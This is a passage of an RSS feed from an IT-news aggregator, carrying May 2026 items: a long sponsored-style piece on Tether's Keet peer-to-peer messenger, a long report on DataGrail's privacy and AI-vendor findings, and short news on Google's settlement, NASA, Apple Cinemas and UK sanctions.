<p>The post <a href="https://www.itsecuritynews.info/googles-135m-android-privacy-settlement-who-may-be-eligible/">Google’s $135M Android Privacy Settlement: Who May Be Eligible</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-05-28 18h : 11 posts]]></title>
<description><![CDATA[11 posts were published in the last hour 16:3 : Google’s $135M Android Privacy Settlement: Who May Be Eligible 16:3 : Malicious Websites Track Visitors by Analyzing their SSD Timing Activity 16:3 : New Linux CIFSwitch Kernel Vulnerability Allows Attackers…
Read more →
The post IT Security News Ho...]]></description>
<link>https://tsecurity.de/de/3554812/it-security-nachrichten/it-security-news-hourly-summary-2026-05-28-18h-11-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554812/it-security-nachrichten/it-security-news-hourly-summary-2026-05-28-18h-11-posts/</guid>
<pubDate>Thu, 28 May 2026 18:08:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>11 posts were published in the last hour 16:3 : Google’s $135M Android Privacy Settlement: Who May Be Eligible 16:3 : Malicious Websites Track Visitors by Analyzing their SSD Timing Activity 16:3 : New Linux CIFSwitch Kernel Vulnerability Allows Attackers…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-28-18h-11-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-28-18h-11-posts/">IT Security News Hourly Summary 2026-05-28 18h : 11 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google’s $135M Android Privacy Settlement: Who May Be Eligible]]></title>
<description><![CDATA[Google’s $135 million Android settlement could pay eligible US users who used Android devices with cellular data since November 2017.
The post Google’s $135M Android Privacy Settlement: Who May Be Eligible appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3554757/it-nachrichten/googles-135m-android-privacy-settlement-who-may-be-eligible/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554757/it-nachrichten/googles-135m-android-privacy-settlement-who-may-be-eligible/</guid>
<pubDate>Thu, 28 May 2026 17:48:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google’s $135 million Android settlement could pay eligible US users who used Android devices with cellular data since November 2017.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-google-android-privacy-settlement/">Google’s $135M Android Privacy Settlement: Who May Be Eligible</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Keet: Tether’s P2P communication app built to survive internet shutdowns]]></title>
<description><![CDATA[One hundred and ninety-three in 41 countries: that is the reported figure on cases of social media shutdowns across Africa between 2016 and 2024. The subsequent years weren’t any better, with cases rising to 300 between 2024 and 2026. Each case affecting at least 10 million people: national stake...]]></description>
<link>https://tsecurity.de/de/3554455/it-nachrichten/keet-tethers-p2p-communication-app-built-to-survive-internet-shutdowns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554455/it-nachrichten/keet-tethers-p2p-communication-app-built-to-survive-internet-shutdowns/</guid>
<pubDate>Thu, 28 May 2026 16:17:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>One hundred and ninety-three in 41 countries: that is the reported figure on cases of social media shutdowns across Africa between 2016 and 2024. The subsequent years weren’t any better, with cases <a href="https://www.unesco.org/en/articles/unesco-statement-internet-shutdowns" target="_blank" rel="sponsored">rising</a> to 300 between 2024 and 2026. Each case <a href="https://www.top10vpn.com/research/cost-of-internet-shutdowns/" target="_blank" rel="sponsored">affecting at least 10 million people</a>: national stakeholders target platforms like WhatsApp, Telegram, and Facebook to curb democracy in contributions to national matters.</p>



<p>Away from Africa, censorship is a global issue and affects the highest levels of civilization and technological advancement. Cases of strategic user limitation have been reported across Europe, Asia, and the Americas; a perfect representation of the depth of censorship worldwide.</p>



<p>Beyond censorship, server failures are also implicated in what is now known as unintentional deplatforming. For example, there have been AWS, Oracle, and Cloudflare data center outages and <a href="https://www.networkworld.com/article/4113326/2026-network-outage-report-and-internet-health-check.html" target="_blank">more than 4 cases</a> in the first three months of 2026.</p>



<p>While <a href="https://www.unesco.org/en/articles/unesco-statement-internet-shutdowns" target="_blank" rel="sponsored">UNESCO</a> and the #keepiton movement continue to advocate for social freedom and against intentional deplatforming, the inherent design of the internet and social applications is the greatest enabler of censorship.</p>



<p>Deplatforming mostly takes a ‘provider’ route: blocking via DNS/IP restrictions, suspending internet gateways, GPS spoofing/jamming for ISP satellites, removal from app stores, and DPI throttling make up a long list. Apparently, providers’ control over the core communication infrastructure threatens the usability of social tools for the billions who rely on them.</p>



<p>The ‘unstoppable web’; an optimistic vision of the internet, championed by applications that solve the centralization problem by excising providers and supporting usage by millions of users, is a view held to the core by Tether. ‘The stable project’ is weaving the <a href="https://qvac.tether.io/" target="_blank" rel="sponsored">fabrics</a> of financial, communication, and technological sovereignty with integrated solutions.</p>



<p>On July 25, 2022, Tether launched <a href="https://keet.io/" target="_blank" rel="sponsored">Keet</a>, a distributed social messaging application built with the Pear runtime. A collaborative effort between the stablecoin firm and <a href="https://holepunch.to/" target="_blank" rel="sponsored">Holepunch</a>, Keet combines a self-verifying data structure, a P2P file management protocol, and holepunching technology, each forming layers of a hyper-efficient system that creates tamper-proof connections between millions of devices.</p>



<p>The technology that underlies Keet is a counter-response to deplatforming and the centralized internet. It does not rely on servers to operate, and turns users into infrastructure, creating a connectivity web that serves as a substrate for billions of users in an unstoppable flow of communication.</p>



<p>The Keet application has been downloaded over a million times across <a href="https://play.google.com/store/apps/details?id=io.keet.app" target="_blank" rel="sponsored">Google Play Store</a>, <a href="https://apps.apple.com/us/app/keet-private-encrypted-chat/id6443880549" target="_blank" rel="sponsored">iOS App Store</a>, and as a <a href="https://keet.io/download/" target="_blank" rel="sponsored">native desktop application</a>. Commenting on the application’s growing popularity, Tether CEO, Paolo Ardoino, said;</p>



<p><em>“Keet is gaining significant traction. Especially in countries where freedom of speech is under attack, and the most common messaging platforms are no longer trusted by the local population. Pure P2P is unstoppable.”</em></p>



<p>Keet supports text and video-based communication. Just like popular centralized social apps, it supports personal and group chats, lets you create channels, host group calls, and make crystal-clear video calls.</p>



<p><strong>Untethering the internet from ‘providers’ with Holepunch</strong></p>



<p>Holepunch is the connectivity layer of the Keet application. It is Tether’s solution to centralization in communication that plagues both human and AI agents. As a base layer for cutting-edge applications, it is purpose-built for a broad range of use cases and employs a peer-based development and operational approach.</p>



<p>Holepunch establishes secure, tamper-proof inter-device communication using HyperDHT, a distributed hash table based on the Kademlia algorithm that serves as the global coordination layer for connectivity on Keet.</p>



<p>Devices in the network discover each other using ‘Topic’, a 32-byte hash key that connects entities with the same intent. When connected, devices can send text messages using Hypercore. Hypercore is an ‘add-only’ data log that verifies and records data in real time using a signed Merkle tree.</p>



<p>File transfer on Keet is handled by Hyperdrive. Hyperdrive is an evolution of P2P file systems; it enables users to share and download files in real time and without servers.</p>



<p>By enabling inter-device connectivity without ‘providers’ via hypercores and HyperDHT, Holepunch sets the stage for unstoppable, private communication. On Keet, the communicating devices handle all aspects of their information transfer without interacting with a server or any controlled infrastructure.</p>



<p>Holepunch’s technology is packaged into <a href="https://pears.com/" target="_blank" rel="sponsored">Pear</a>, a P2P runtime and development kit that enables developers to easily build decentralized applications for various sectors. Keet was developed with the Pear runtime, which also powers a range of other applications, including Tether’s AI applications; the <a href="https://qvac.tether.io/products/health/" target="_blank" rel="sponsored">QVAC Health</a> and <a href="https://qvac.tether.io/products/workbench/" target="_blank" rel="sponsored">QVAC Workbench</a>, an AI-powered Work Assistant, and <a href="https://pass.pears.com/" target="_blank" rel="sponsored">PearPass</a>, a decentralized password manager.</p>



<p><strong>Scaling a distributed application, infinitely: Unstoppable communication, unlimited users</strong></p>



<p>To date, peer-based internet and applications are more popular among cypherpunks and a siloed community of users. This is as deliberate as an alpha testing program for a new application. Decentralized internet solutions break down at scale due to their architecture. But for an application intended for widespread use, Keet must maintain high performance as user counts grow.</p>



<p>Keet’s scalability is built into the Holepunch backend. Holepunch turns every user into part of the network’s overall infrastructure. Each new user is an asset, exponentially expanding network capacity by contributing their bandwidth and creating a Swarm that securely streams and downloads information.</p>



<p>Yet, Keet’s biggest appeal is its indestructibility. Like other Holepunch applications, Keet lives on users’ devices rather than a central server. Therefore, as long as there are peers (users) on the network, the application will continue to work.</p>



<p>According to Mathias Buus, Co-founder of Holepunch:</p>



<p><em>“If we stop working, the apps will still work.”</em></p>



<p><strong>Shifting to decentralized media</strong></p>



<p>Decentralization is the only way we maintain control and challenge schemes to trim how we communicate. In addition to ensuring that no entity disrupts our means of communication, decentralized media also offers true privacy. Instead of relying on privacy policies that are enabled by default, decentralized media ensures that confidential data is never exposed. Keet is the netizens’ ticket to secure, scalable, unstoppable, and private communication.</p>



<p></p>



<p><strong>Take back control of your communication by downloading the <a href="https://keet.io/download/" target="_blank" rel="sponsored">Keet application</a> and checking out other applications built with Pear and Holepunch.</strong></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[DataGrail report finds your vendor may be sending data to AI models you never approved]]></title>
<description><![CDATA[The data processing agreement (DPA) — the bedrock contract companies use to evaluate how vendors handle personal data — can no longer be trusted at face value. That is the central, and arguably most alarming, conclusion of DataGrail's Privacy and AI Trends Report 2026, released today.The San Fran...]]></description>
<link>https://tsecurity.de/de/3551987/it-nachrichten/datagrail-report-finds-your-vendor-may-be-sending-data-to-ai-models-you-never-approved/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551987/it-nachrichten/datagrail-report-finds-your-vendor-may-be-sending-data-to-ai-models-you-never-approved/</guid>
<pubDate>Wed, 27 May 2026 19:17:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The data processing agreement (DPA) — the bedrock contract companies use to evaluate how vendors handle personal data — can no longer be trusted at face value. That is the central, and arguably most alarming, conclusion of DataGrail's <a href="https://www.datagrail.io/resources/interactive/data-privacy-trends-report-2026/"><i>Privacy and AI Trends Report 2026</i></a>, released today.</p><p>The San Francisco-based privacy platform analyzed 2,400 popular business software providers and found that 63.6% of vendors that prominently advertise AI capabilities do not disclose a third-party AI subprocessor in their legal documentation. The implication: the majority of companies purchasing AI-enabled software may be unknowingly exposing their customers' data to AI models and pipelines they never reviewed, never approved, and may not even know exist.</p><p>"All software vendors are trying to move to become AI vendors, which makes sense, but the technologies are moving faster than AI governance can actually keep up," DataGrail co-founder and CEO Daniel Barber told VentureBeat in an exclusive interview ahead of the report's release. "The DPA should be the reliable document that teams use to evaluate AI risk, but based on that number, that's not enough in 2026."</p><p>The finding drops into an enterprise landscape where organizations with high levels of shadow AI already experience average breach costs of $4.63 million — $670,000 more than those with low or no shadow AI, according to IBM's <a href="https://www.ibm.com/reports/data-breach">2025 Cost of Data Breach Report</a>. And it arrives in a year when U.S. states gave out <a href="https://www.gartner.com/en/newsroom/press-releases/2026-04-28-gartner-estimates-us-states-privacy-fines-totaled-3-point-425-billion-dollars-in-2025-trend-expected-to-accelerate-through-2028?utm_campaign=SM_GB_YOY_GTR_SOC_SF1_SM-PR&amp;utm_source=threads,twitter&amp;utm_medium=social">$3.425 billion in privacy-related fines</a> — more than the last five years combined — a trend Gartner expects to accelerate through 2028.</p><h2><b>How researchers uncovered the growing gap between AI vendor contracts and reality</b></h2><p>DataGrail's methodology for arriving at the 63.6% figure goes well beyond reading contracts. The company's research team cross-referenced DPA disclosures against product documentation, GitHub environments, API connections, and marketing materials for each of the 2,400 vendors in its tracking universe.</p><p>Barber walked VentureBeat through the process: "We looked at the DPA as the baseline, but then what we also looked at is the GitHub environment, the API connections that a particular vendor has, the product documentation, the marketing documentation, and triangulate that information to discern — okay, so the DPA document says use OpenAI, but actually you've got these three AI subprocessors over here in your product documentation outlining features and functionality, but that is not reflected in your DPA."</p><p>When asked directly about how confident he was that these gaps represent actual shadow AI risk rather than vendors using proprietary technology, Barber was unequivocal. "Very confident, because we looked at the sample of the 2,400 systems, and we spent a substantial amount of time actually looking at product documentation, GitHub environments, looking at actual API connections, because we integrate with these systems as well, so we know how they process personal information. It is from primary research."</p><p>The disclosure gap matters because it undermines the entire chain of trust that privacy programs rely on. Consider a scenario Barber described: A company invests in an AI recruiting tool. The tool's DPA lists Claude as its foundational model. The company dutifully performs a security review of Anthropic's AI. But the recruiting tool also quietly uses OpenAI and Gemini behind the scenes — models the company never evaluated. </p><p>Those undisclosed models then process thousands of resumes and execute automated hiring decisions. The company, without knowing it, has exposed sensitive personal information — home addresses, financial data, possibly Social Security numbers — to AI systems it never vetted, potentially violating FTC regulations on automated decision-making in employment. "How those vendors are evaluating and performing that automated decision making could be really disastrous for a business," Barber said.</p><h2><b>One-third of AI systems also process sensitive data, and the true number is likely higher</b></h2><p>The disclosure gap alone would be concerning enough. But <a href="https://www.datagrail.io/resources/interactive/data-privacy-trends-report-2026/">DataGrail's report</a> layers on another finding that makes the problem materially worse: 32.8% of AI systems that disclose AI capabilities also disclose at least one other high-risk activity, such as processing sensitive personal information or powering automated decision-making. Among AI systems with self-reported risk factors, 47.1% process personal data, 20.7% have the potential to power automated decision-making, 16.5% process sensitive data categories like health or financial information, and 7.5% process biometric data.</p><p>The report argues these figures almost certainly undercount actual exposure, since they reflect only what vendors have formally disclosed. Vendors could underreport access to personal data, and the inherent flexibility of AI means even good-faith vendors might not predict riskier user applications of their tools.</p><p>This has immediate regulatory implications. The <a href="https://cppa.ca.gov/announcements/2025/20250923.html">CCPA's new risk assessment requirement</a>, effective January 1, 2026, requires businesses to conduct and document risk assessments for processing activities that present significant privacy risks — and will require submission to CalPrivacy by April 2028, with executive attestation under penalty of perjury. </p><p>Processing sensitive personal information with AI, or using AI for automated decision-making, are precisely the activities that trigger this obligation. The report finds that 42% of companies abandoned AI initiatives in 2025 with data privacy concerns cited as a primary obstacle — a statistic sourced to <a href="https://www.spglobal.com/market-intelligence/en/news-insights/research/2025/10/generative-ai-shows-rapid-growth-but-yields-mixed-results">S&amp;P Global research</a>. Privacy teams that engage early with AI projects, Barber argues, can prevent that waste by ensuring safeguards are in place before launch, with AI risk assessments serving as the right starting point.</p><h2><b>Why consent management became 2025's most punished privacy failure</b></h2><p>While shadow AI is still a newer category of threat, the report makes clear that traditional privacy challenges have not eased — they have intensified. Consent management was the busiest enforcement topic of 2025. California alone publicly reported $4.3 million in CCPA consent settlements, and 2025 saw over 1,400 class action wiretapping suits driven by private firms investigating tracking pixels and session replay software.</p><p>Despite this enforcement wave, 63% of the 5,000 websites DataGrail audited still fail to comply with universal opt-out mechanisms such as the Global Privacy Control signal. While that figure represents an improvement from 75% non-compliance in 2023, the pace of improvement is slow relative to the acceleration in enforcement.</p><p>Barber pointed to the case of <a href="https://www.toddsnyder.com/">Todd Snyder</a>, the menswear retailer that the California Privacy Protection Agency <a href="https://cppa.ca.gov/announcements/2025/20250506.html">fined $345,178</a> in May 2025, as evidence that enforcement is no longer reserved for big tech. "This is a business that has two or three stores across the U.S. They have 300 employees," he said. "They run tight margins because they're a consumer menswear clothing store."</p><p>The California Attorney General also reached a <a href="https://oag.ca.gov/news/press-releases/california-wont-let-it-go-attorney-general-bonta-announces-275-million">$2.75 million settlement with Disney</a> over failures to honor opt-out signals, while the California Privacy Protection Agency has brought enforcement actions against <a href="https://privacy.ca.gov/2026/03/youth-sports-media-company-to-pay-1-1-million-fine-change-practices-over-privacy-violations/">PlayOn Sports</a> and <a href="https://www.koleyjessen.com/insights/publications/lessons-for-businesses-from-2026s-first-california-privacy-enforcement-actions">Ford</a> — a pattern that demonstrates both the breadth and depth of regulatory activity. Among the trackers that fire even after a user sends a GPC signal, the report found that 27.1% come from Google Analytics and 43.8% are for targeted advertising via platforms like Meta and Microsoft.</p><p>For users who do engage with consent banners, 48.3% click "Accept all," while only 12.4% select "Essential only" and 2.3% customize their preferences. A full 37% simply exit the banner without making a selection. The practical takeaway: less than 15% of users make a conscious choice to opt out of tracking, which means consent banners present relatively low business risk when properly configured — but enormous regulatory risk when they are not.</p><h2><b>Data deletion requests surge 567% as the cost of manual processing hits $1.5 million a year</b></h2><p>Data subject request volume hit an all-time high for the fifth consecutive year. Deletion requests have surged 567% since 2021 and now represent 87% of all data subject requests. Access requests, by contrast, have gradually declined as consumers skip visibility and reach straight for the delete button.</p><p>The cost is staggering. For a mid-sized organization receiving 5 million annual web visitors, the report estimates manual DSR management now runs approximately $1.5 million per year, based on Gartner's <a href="https://trustarc.com/resource/dsr-request-management-global-comparison/">estimated cost of $1,524 per manual DSR</a>. The average cost has climbed from $238,000 in 2021 to $1.51 million in 2025 — a trajectory that makes manual processing not just inefficient but, as the report argues, "irresponsible."</p><p>Barber emphasized that these numbers reflect verified human requests with bot and spam traffic excluded, and that data broker scenarios — which will see their own massive influx of requests under <a href="https://en.wikipedia.org/wiki/Delete_Act">California's Delete Act</a> — are reported separately. "That is a natural increase," Barber told VentureBeat. "If you've now got 20-plus U.S. states with privacy regulation, it's unlikely that we see a federal bill passed, even though we've seen one proposed. And while we don't see federal awareness and regulation, we do see at the state level over 20 states, and that may actually increase awareness for the consumer even more."</p><p>He added a telling detail about how businesses are responding in practice: "99% of DataGrail customers do process that deletion" even for residents of states without privacy laws, "simply because it's too hard at this point. Discerning and even communicating to the person, 'Hey, you live in Montana, sorry, you're just in an unfortunate state without regulation' — you just can't do that." Data brokers felt the impact most acutely, with a 398% increase in deletion requests compared to 2024 and an average of over 2,000 deletion requests handled per month.</p><h2><b>State regulators issued $3.4 billion in privacy fines last year, and both parties want more</b></h2><p>The regulatory landscape underpinning all of these trends has fundamentally shifted from education to punishment. Nearly half of U.S. states now have a <a href="https://pro.bloomberglaw.com/insights/privacy/state-privacy-legislation-tracker/">comprehensive privacy law</a> in effect, plus <a href="https://www.brookings.edu/articles/how-different-states-are-approaching-ai/">over 160 AI-specific laws</a>. State legislatures enacted 145 AI-related laws in 2025 alone, with another thousand introduced or reworked. According to Gartner, over 50% of the U.S. population is now covered by a comprehensive state privacy law, with 24 additional states expected to pass laws within five years. States have also begun pooling their resources, with ten forming the <a href="https://www.jdsupra.com/legalnews/two-more-states-join-consortium-of-6791648/">Consortium of Privacy Regulators</a> last year and pledging to coordinate investigations across state lines.</p><p>Barber argued that privacy enforcement is fundamentally bipartisan, which insulates it from the shifting political winds of the current administration. "Privacy overall is a pretty bipartisan issue," he said. "It's easy to pass privacy regulation because constituents somewhat expect privacy in their day-to-day living. If you were flying on an airline and they said, 'Okay, this seat, if you want your privacy, you're going to have to pay $6 more,' you're like, 'I'm going to go to another airline.' It's an expected part of a transaction at this stage."</p><p>He predicted that other states will replicate California's enforcement model. "California has their enforcement division, CalPrivacy. That group has one task: to ensure enforcement of privacy throughout businesses. Is it likely that we see other states get funding and support to fund these types of groups? Highly likely. The enforcement fines — the actual payments — go back to us as constituents. That type of model, you could imagine, being very popular across the country."</p><h2><b>Privacy teams are losing a third of their staff just as AI governance demands explode</b></h2><p>Perhaps the most paradoxical finding in the report is that privacy teams lost as much as <a href="https://www.isaca.org/resources/reports/state-of-privacy-2026">33% of their headcount last year</a>, even as their workloads expanded across every metric the report tracks. Cisco data cited in the report shows that 90% of privacy programs expanded in 2025 due to AI, while only 12% of AI governance programs are considered mature. Meanwhile, 74% of privacy teams planned to apply AI to privacy-related tasks in 2026, according to <a href="https://www.isaca.org/about-us/newsroom/press-releases/2026/new-isaca-study-privacy-teams-are-shrinking-increasingly-stressed">ISACA's State of Privacy 2026 survey</a>.</p><p>Barber sees this as part of a broader macroeconomic pattern rather than a sign that organizations do not value privacy. "It's actually a fascinating macro trend, and probably one you've seen across all functions," he said. "Businesses are driving more efficiency in all parts of the business. Privacy teams, five years ago, we would have said, 'Well, there's more regulation, the volume of deletions have increased 500%, we need more humans.' It's become clear that AI provides capabilities that can do the work for privacy individuals." He drew an analogy: "They might have had a design team of 20 people five years ago, now they have a design team of five, courtesy of Claude Design or Gamma or whatever the tool may be. I think that's what we're seeing here as well."</p><p>DataGrail has positioned its own AI agent, <a href="https://www.datagrail.io/blog/product/introducing-vera-the-first-complete-ai-privacy-agent/">Vera</a> — launched in March 2026 — as part of the answer. Vera is embedded within DataGrail's existing platform and aims to automate privacy workflows across multiple jurisdictions. The company was also named the first production-ready<a href="https://www.datagrail.io/blog/product/whats-new-from-datagrail-february-2026/"> Model Context Protocol server for privacy</a>, using the standard created by Anthropic to enable customers to launch DataGrail tools from whatever application they are already working in, whether Slack, email, or Claude.</p><h2><b>Can a vendor-produced report be trusted to diagnose the problems that vendor sells solutions for?</b></h2><p>DataGrail is, of course, a company that directly benefits from the problems its report identifies. The company has raised a total of $84.2 million over five rounds, with its largest being a <a href="https://www.datagrail.io/press/datagrail-raises-45-million/">$45 million Series C</a> in October 2022 led by Third Point Ventures. Its platform addresses precisely the data mapping, DSR automation, consent management, and risk assessment challenges the report spotlights.</p><p>Barber acknowledged the tension directly. "It's a fair statement," he said when asked about potential skepticism. "DataGrail doesn't provide a service to keep DPAs up to date — that's on a business to evaluate how they work with a vendor. What DataGrail does help to do is assessments, and automate those assessments using our AI agent, Vera, to assess that increased risk."</p><p>He argued that the more neutral reading of the data is structural: "This is evidence to show that the DPA unfortunately is not keeping up with technology and the speed at which technology is innovating. That's both exciting but also we need to accept that's where we are." The methodology does lend some credibility to this claim. </p><p>The report draws on anonymized privacy operations data from hundreds of enterprise customers, the 2,400-system AI tracking database, and the 5,000-website consent audit — sources that are at least partially independent of DataGrail's commercial interests. And the broader findings on enforcement spending, DSR volume trends, and regulatory expansion align closely with independently published data from Gartner, Cisco, and state enforcement agencies.</p><h2><b>The next frontier: agentic AI could spread unvetted data across entire organizations autonomously</b></h2><p>When asked about the most important trend that did not make it into the report, Barber pointed to a next-generation risk that extends the shadow AI problem into far more dangerous territory: agentic AI workflows. Gartner predicts <a href="https://www.pagerduty.com/resources/itops/analyst-report/gartner-predicts-report-2026-ai-agents-transform-it-infrastructure-operations/">40% of enterprise applications</a> will feature task-specific AI agents by end of 2026, up from under 5% in 2025 — a pace of adoption that could rapidly outstrip the governance mechanisms companies are only now beginning to build.</p><p>"Where we go next with this research is agent processing," Barber said. "How are agents then leveraging that information? Because the downstream ramifications would be far more concerning for a business. One particular system is using shadow AI, the business has no idea that that's happening, and then an agent is propagating that information across a whole bunch of other places. The guardrails of you and I checking the system will be lower than maybe what we've seen in the past with agentic workflows."</p><p>He framed the distinction in human terms: "The identity of an agent is different than a human. There is thought that goes into what am I about to use here, where did this information come from, how was it collected — that may not be considered in the same way for an agentic workflow. We need to solve the root of the problem, which is how are these businesses leveraging AI subprocessors. But this quickly becomes an agentic problem that could be far more concerning."</p><p>For the enterprise privacy and security leaders absorbing this report today, the uncomfortable truth is that the foundational documents and processes they have relied on to manage vendor risk for years are decomposing in real time. The DPA is breaking down as a reliable instrument. State enforcement is accelerating on a bipartisan basis. Privacy teams are shrinking even as their mandates expand. And the next wave of agentic AI systems threatens to distribute unvetted data processing across networks of autonomous agents that operate with even less human oversight than today's tools.</p><p>Five years ago, when DataGrail published its first trends report, deletion requests were a fraction of what they are today, only a handful of states had privacy laws on the books, and the phrase "shadow AI" did not exist. Every year since, the report has warned that the problem was getting worse. Every year, the data has proved it right. The companies that survive the next chapter will not be the ones with the biggest compliance teams or the thickest policy binders. They will be the ones that accept a disorienting new reality: in 2026, the contracts you signed may not describe the AI that is already processing your customers' data — and by 2027, autonomous agents may be deciding what to do with it.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NASA Plans Giant Moon Base at Lunar South Pole for Artemis Era]]></title>
<description><![CDATA[NASA plans to build a vast lunar base near the Moon’s south pole during the 2030s. Water ice, near-constant sunlight, drones, and advanced rovers could support long-term human settlement under the Artemis program.]]></description>
<link>https://tsecurity.de/de/3551496/it-nachrichten/nasa-plans-giant-moon-base-at-lunar-south-pole-for-artemis-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551496/it-nachrichten/nasa-plans-giant-moon-base-at-lunar-south-pole-for-artemis-era/</guid>
<pubDate>Wed, 27 May 2026 16:47:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[NASA plans to build a vast lunar base near the Moon’s south pole during the 2030s. Water ice, near-constant sunlight, drones, and advanced rovers could support long-term human settlement under the Artemis program.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Cinema is trying to appease the wrath of Apple's lawyers]]></title>
<description><![CDATA[Apple Cinemas appears to be backing down in its trademark fight against Apple, as a new report claims the two sides are now looking for an out-of-court settlement.Apple Cinemas is being sued by Apple. Image source: AppleApple has objected to what it sees as trademark infringement by Apple Cinemas...]]></description>
<link>https://tsecurity.de/de/3551122/ios-mac-os/apple-cinema-is-trying-to-appease-the-wrath-of-apples-lawyers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551122/ios-mac-os/apple-cinema-is-trying-to-appease-the-wrath-of-apples-lawyers/</guid>
<pubDate>Wed, 27 May 2026 14:55:38 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple Cinemas appears to be backing down in its trademark fight against Apple, as a new report claims the two sides are now looking for an out-of-court settlement.<br><br><div><img src="https://photos5.appleinsider.com/gallery/64693-134791-IMG_2516-xl.jpg" alt="Building signage reads 'Apple Cinemas' with logos for ScreenX and ACX on a light-colored wall." height="720"><br><span>Apple Cinemas is being sued by Apple. Image source: Apple</span></div><br>Apple has objected to what it sees as <a href="https://appleinsider.com/articles/25/08/02/apple-cinemas-may-come-to-regret-their-name-as-lawyers-step-in">trademark infringement</a> by Apple Cinemas, and movie theater company says its reflects its longstanding <a href="https://appleinsider.com/articles/25/08/12/apple-cinemas-name-reflects-geographic-roots-not-the-tech-company">geographic routes</a> in New England.<br><br>Now according to New Hampshire ABC affiliate <em>WMUR</em>, a court hearing scheduled for May 26, 2026, <a href="https://www.wmur.com/article/apple-inc-cinemas-trademark-lawsuit-52626/71413569">was postponed</a>. Reportedly, both Apple and Apple Cinemas filed a motion to continue the case.<br><br><br> <a href="https://appleinsider.com/articles/26/05/27/apple-cinema-is-trying-to-appease-the-wrath-of-apples-lawyers?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244453?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[UK's Foreign, Commonwealth and Development Office Sanctions 18 Entities, Individuals for Overcoming Russian Trade Blockades]]></title>
<description><![CDATA[The UK has sanctioned 18 crypto exchanges, firms, and individuals accused of helping Russia evade international trade restrictions. The action targets the A7 network and entities linked to stablecoin and payment operations connected to the Russian economy.]]></description>
<link>https://tsecurity.de/de/3550864/it-nachrichten/uks-foreign-commonwealth-and-development-office-sanctions-18-entities-individuals-for-overcoming-russian-trade-blockades/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550864/it-nachrichten/uks-foreign-commonwealth-and-development-office-sanctions-18-entities-individuals-for-overcoming-russian-trade-blockades/</guid>
<pubDate>Wed, 27 May 2026 13:31:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The UK has sanctioned 18 crypto exchanges, firms, and individuals accused of helping Russia evade international trade restrictions. The action targets the A7 network and entities linked to stablecoin and payment operations connected to the Russian economy.]]></content:encoded>
</item>
<item>
<title><![CDATA[Technical deep dive: AgentCore payments and innovation in agentic commerce]]></title>
<description><![CDATA[Amazon Bedrock AgentCore payments is now available in preview, it provides instant payments to paid external services with no manual billing setup per provider, stablecoin support for cost-effective microtransactions that make sub-cent transactions economically viable, and configurable spending g...]]></description>
<link>https://tsecurity.de/de/3548938/ai-nachrichten/technical-deep-dive-agentcore-payments-and-innovation-in-agentic-commerce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548938/ai-nachrichten/technical-deep-dive-agentcore-payments-and-innovation-in-agentic-commerce/</guid>
<pubDate>Tue, 26 May 2026 20:03:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon Bedrock AgentCore payments is now available in preview, it provides instant payments to paid external services with no manual billing setup per provider, stablecoin support for cost-effective microtransactions that make sub-cent transactions economically viable, and configurable spending guardrails that give you fine-grained control over agent budgets and transaction limits. In this post, we walk you through a technical deep dive of AgentCore payments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why most AI agents disappoint in production (and what to fix first)]]></title>
<description><![CDATA[AI agents look brilliant in a demo because demos are friendly worlds. The data is curated, the tools behave, and nothing important changes while the agent is in mid-thought. Production is the opposite: data arrives late, facts conflict, permissions bite, APIs time out, and the underlying state ch...]]></description>
<link>https://tsecurity.de/de/3547405/ai-nachrichten/why-most-ai-agents-disappoint-in-production-and-what-to-fix-first/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3547405/ai-nachrichten/why-most-ai-agents-disappoint-in-production-and-what-to-fix-first/</guid>
<pubDate>Tue, 26 May 2026 11:18:38 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
